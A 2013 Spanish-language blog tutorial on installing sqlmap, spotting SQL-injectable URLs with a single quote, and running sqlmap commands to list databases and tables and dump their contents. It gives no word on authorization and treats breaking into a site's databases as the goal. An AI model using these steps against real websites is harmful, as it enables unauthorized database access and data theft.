Anuncios

miércoles, 23 de octubre de 2013

Tutorial de SQL Injection con Sqlmap (En español)


En el siguiente tutorial aprenderemos como utilizar sqlmap para explotar la vulnerabilidad de un sitio web. Aquí la web del autor, se agradecen infinitamente las donaciones.
Yo usaré Ubuntu 13.10 para este tutorial.


Materiales
Sqlmap
Linux (sqlmap.tar.gz)
Windows (sqlmap.zip)

Python
Descargar


Ubuntu (SO)
Descargar
Instalar
Windows
  1.- Instalar Python
  2.- Abrir el archivo y descomprimirlo en C:/sqlmap/
Linux (terminal)
  1.- Abrir una nueva terminal y dirigirnos a la carpeta donde descomprimiremos sqlmap, yo lo haré en "/var/opt/"
    cd /var/opt
  2.- Descomprimir el archivo, yo lo descargué en "~/Documentos/", nos pedira la contraseña y comenzará a descomprimir
    sudo tar -xzvf ~/Documentos/sqlmap.tar.gz

  ¡Finalmente Sqlmap Se instaló!


Encontrando la Vulnerabilidad
Primero necesitamos una url vulnerable, en su mayoría se parecen a esta "index.php?id=65se puede comprobar añadiendo una comilla simple que provoca un error parecido a este:
Una vez encontrada la vulnerabilidad tenemos que comprobar que es vulnerable:
linux:
  sudo -sH (Importante ejecutar los comandos como root o Super User)
  cd /var/opt/sqlmap
  ./sqlmap.py
Windows:
 cd C:/sqlmap/
 python sqlmap.py

Ejecutamos el comando para listar las bases de datos:
  ./sqlmap.py -u "URL VULNERABLE" --dbs

Si todo sale bien nos mostrará un mensaje como este, diciendo que el parámetro es vulnerable y nos pregunta si queremos seguir testeando otros:
Elegimos que no oprimiendo la tecla "N".

Explotando la vulnerabilidad
Una vez encontrada la vulnerabilidad el programa nos mostrará las bases de datos de el sitio, tales como las siguientes:
Tenemos las siguientes bases de datos:
  available databases [2]:                                                           [*] dbkenwright
    [*] information_schema
¡Hemos entrado a las bases de datos del sistema!


Comandos
Les dejaré los comandos de lo que podemos hacer, de igual manera se pueden consultar con:
./sqlmap.py --help

Comprueba si el parametro es vulnerable y lista las bases de datos del sitio
  ./sqlmap.py -u "urlvulnerable.com/?id=12" --dbs
Lista las tablas del sitio
  ./sqlmap.py -u "urlvulnerable.com/?id=12" -D <DataBase> --tables 
Muestra el contenido de las tablas
  ./sqlmap.py -u "urlvulnerable.com/?id=12" -D <DataBase> -T <table> --dump


1 comentario: